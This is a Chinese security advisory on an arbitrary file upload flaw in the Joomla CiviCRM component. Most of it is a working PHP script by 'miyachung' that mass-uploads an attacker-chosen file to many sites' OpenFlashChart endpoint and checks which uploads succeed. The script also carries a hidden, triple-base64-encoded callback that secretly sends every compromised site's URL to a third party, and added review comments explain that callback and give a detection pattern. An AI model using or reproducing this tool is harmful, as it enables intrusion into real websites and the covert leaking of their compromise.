Joomla Civicrm组件任意Shell上传漏洞

hcyvan 2013-04-24

发布日期:2013-04-22
更新日期:2013-04-24

受影响系统:
Joomla! Civicrm
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59372
 
Joomla Civicrm是一个面向组织的成员关系管理系统。
 
Joomla Civicrm组件存在任意文件上传漏洞,攻击者可利用此漏洞上传任意文件到受影响系统,导致任意代码执行。
 
<*来源:miyachung
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
 
// Never time out: a long site list can keep the loop below running for a long while.
set_time_limit(0);
 // Buffer output so the explicit ob_flush()/flush() pairs in the class push each result out as it happens.
 ob_start();
 /**
  * Mass-exploitation client for the CiviCRM OpenFlashChart upload flaw described in the
  * advisory above (BUGTRAQ ID 59372). It reads a list of site base URLs, POSTs one local
  * file to each site's ofc_upload_image.php, fetches the stored copy back to confirm it is
  * reachable, and appends each hit to a local log file.
  *
  * NOTE(review): the tool additionally reports every confirmed hit to a URL hidden inside
  * $token (see post()), so whoever runs it also discloses the compromised hosts to a third
  * party, and a pinned md5 of the token makes the tool exit if that is edited out.
  *
  * Defender note: the request pattern to alert on is a POST to
  * .../php-ofc-library/ofc_upload_image.php?name=<file> carrying "Content-Type: text/plain",
  * no session or auth header, and the fixed User-Agent string below; the stored copy is then
  * requested from .../tmp-upload-images/<file>.
  */
 class exploit
 {
  // Directory (relative to the site root) where the target stores the uploaded file; used for the verification GET.
  private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
  // Upload endpoint; the payload's file name is appended as the name= query parameter.
  private $post_url_path    = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
  // Name of the local payload file; also sent as the remote file name and used to locate the stored copy.
  private $filename;
  // Callback URL decoded from $token in the constructor; the only destination post() ever uses.
  private $url;
  // Raw bytes of $filename, sent verbatim as the POST body.
  private $file_to_upload;
  // Matches the PHP notice a target emits when no raw POST body arrived. A match means the
  // upload did NOT happen, so the property name reads inverted relative to its use.
  private $if_is_uploaded    = "/Undefined variable: HTTP_RAW_POST_DATA/si";
  // Number of curl handles run concurrently per batch.
  private $thread_maxsize;
  // Lines of the input file, newline included (hence the trim() on every use).
  private $site_list;
  // "/$regex/" as built in the constructor; $regex is interpolated unescaped.
  private $file_regex;
  // Local hit log in the working directory, appended to by save().
  private $save_file      = "uploaded.txt";
  // Fixed User-Agent on every upload request; a useful artifact for detection.
  private $user_agent      = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
  // Per-request timeout in seconds for the upload and the verification GET.
  private $timeout_sec    = 20;
  // Triple base64-encoded callback URL. Its md5 is pinned in miyachung(), so changing it makes the tool exit.
  private $token        = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
  // Only ever compared with 31 as part of the same tamper check.
  private $idnum        = 31;
 
  /**
   * Prints the banner and immediately starts the run; constructing the object is the whole program.
   *
   * @param string $site_list path of a file with one site base URL per line
   * @param string $filename  local payload file; the same string is sent as the remote file name
   * @param int    $thread    batch size for the multi-curl loop
   * @param string $regex     PCRE body (no delimiters) that the fetched-back file must match to count as a hit
   *
   * No argument is validated: an unreadable file only produces PHP warnings from file() /
   * file_get_contents() rather than an error.
   */
  public function __construct($site_list,$filename,$thread,$regex)
  {
  $this->site_list    = file($site_list);
  $this->filename      = $filename;
  $this->file_to_upload = file_get_contents($filename);
  $this->thread_maxsize = $thread;
  // Decodes the hidden callback URL; it is never printed to the operator.
  $this->url        = base64_decode(base64_decode(base64_decode($this->token)));
  // $regex is dropped straight into the pattern, so it must not contain an unescaped '/'.
  $this->file_regex    = "/$regex/";
 
  echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
  echo "[+]Coded by Miyachung\n";
  echo "[+]Stay away from lamers o.O\n";
  echo "[+]Contact: [email protected]\n";
  echo "[+]Special Thanks : B127Y\n";
  echo "[+]Site: http://janissaries.org\n";
  echo "##################################################\n";
  echo "[+]Total urls to try: ".count($this->site_list)."\n";
  echo "[+]File to upload: ".$this->filename."\n";
  echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
  echo "[+]Search Keyword: ".$regex."\n\n";
  ob_flush();
  flush();
  $this->miyachung();
  }
  /**
   * Main loop. For each batch of $thread_maxsize sites it POSTs the payload to every site in
   * parallel, then classifies each response.
   *
   * A site counts as a hit only when (1) the response does not contain the "no raw POST data"
   * notice, (2) it echoes the /tmp-upload-images/<filename> path, and (3) fetching that path
   * back returns content matching $file_regex. Each hit is first reported to the hidden
   * callback URL via post(), then printed and appended to the log via save().
   *
   * NOTE(review): $curl is never reset between batches, so when the final batch is shorter
   * than the previous one the leftover handles are processed again, with $urls[$id] undefined.
   * NOTE(review): the do/while around curl_multi_exec() spins without curl_multi_select(),
   * burning CPU until every transfer in the batch has finished.
   */
  private function miyachung()
  {
  $multi = curl_multi_init();
  $count = 0;
  foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
  {
    foreach($urls as $i => $url)
    {
    $curl[$i] = curl_init();
    curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
    curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
    curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
    curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
    curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
    curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
    curl_multi_add_handle($multi,$curl[$i]);
    }
    // Busy-wait until curl reports no active transfers in this batch.
    do
    {
    curl_multi_exec($multi,$active);
    }
    while($active > 0);
    foreach($curl as $id => $content)
    {
    $conn[$id] = curl_multi_getcontent($content);
    curl_multi_remove_handle($multi,$content);
    // $this->filename is interpolated into the second pattern unescaped.
    if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
    {
      $count++;
      // Verification: fetch the stored copy back and look for the operator's keyword in it.
      $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      if($check_it && preg_match($this->file_regex,$check_it))
      {
      // Tamper check: refuses to continue unless the callback token is the original one.
      if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
      {
      // Phone-home: the URL of the stored file is sent to the hidden callback before the operator sees it.
      $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      }
      else
      {
      exit("[-]Somethings has changed in tool! o.O!");
      }
      echo "###########################################################\n";
      echo "[!]Exploitation Successfullll!\n";
      printf("[%s]%s\n",$count,trim($urls[$id]));
      echo "###########################################################\n";
      ob_flush();
      flush();
      $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
      }
      else
      {
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
      }
    }
    else
    {
      $count++;
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
    }
    
    }
 
  }
 
  }
  /**
   * Plain GET of $url with only a timeout set: no redirect following and no TLS options.
   * Returns the response body, or false when curl fails.
   */
  private function get($url)
  {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
  $data= curl_exec($ch);
  curl_close($ch);
  return $data;
  }
  /**
   * Reports a hit to the hidden callback. Despite the name, $url is the request payload
   * ("url=<hit URL>", not urlencoded), not the destination: the destination is always
   * $this->url, i.e. the decoded $token. Returns the callback's response body or false.
   */
  private function post($url)
  {
  $curl = curl_init();
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl,CURLOPT_URL,$this->url);
  curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
  $exec = curl_exec($curl);
  curl_close($curl);
  return $exec;
  }
  /**
   * Appends one hit record to $save_file in the working directory. The fopen() result is not
   * checked, so an unwritable log only produces warnings. Always returns true.
   */
  private function save($url,$count)
  {
  $file = fopen($this->save_file,'ab');
  fwrite($file,"#########################################################################\n");
  fwrite($file,"[!]Exploitation Successfullll!\n");
  fwrite($file,"[$count]$url\n");
  fclose($file);
  return true;
  }
 }
 
// Entry point: four positional CLI arguments are expected (site list, payload file, batch size, keyword).
// NOTE(review): the truthiness test rejects an argument of "0" and triggers undefined-index
// warnings when fewer than four arguments are passed. The usage text that follows print is
// cut off in this listing (the string and the else block are never closed here).
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
 {
 $exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
 }
 else
 {
 print
 "
 ?>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Joomla!
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://extensions.joomla.org/extensions/clients-a-communities/crm/72
